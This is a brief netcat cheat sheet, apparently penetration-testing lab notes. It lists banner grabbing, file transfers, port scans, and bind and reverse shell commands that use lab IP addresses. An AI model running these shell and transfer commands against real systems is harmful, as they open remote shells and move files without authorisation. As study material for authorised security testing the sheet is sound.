netcat

Assorted commands

#Banner grab

nc -nv 10.10.10.10 80

#Windows โ†โ†’ Kali transfers

C:\Users\offsec> nc -nlvp 4444 > incoming.exe

nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe

#Linux โ†โ†’ Kali Transfers

Receiver: netcat -l -p 4444 > received_file.txt

Sender: netcat 192.168.65.149 4444 < received_file.txt

#Port Scanning

netcat -z -v 192.168.65.149 1-1000

netcat -z -n -v 198.51.100.0 1-1000 2>&1 | grep succeeded

#UDP scan

nc -nv -u -z -w 1 10.11.1.115 160-162

#Bind Shell (Windows โ†โ†’ Kali)

C:\Users\offsec> nc -nlvp 4444 -e cmd.exe

nc -nv 10.11.0.22 4444

#Reverse Shell (Windows โ†โ†’ Kali)

C:\Users\offsec> nc -nlvp 4444

nc -nv 10.11.0.22 4444 -e /bin/bash

Last updated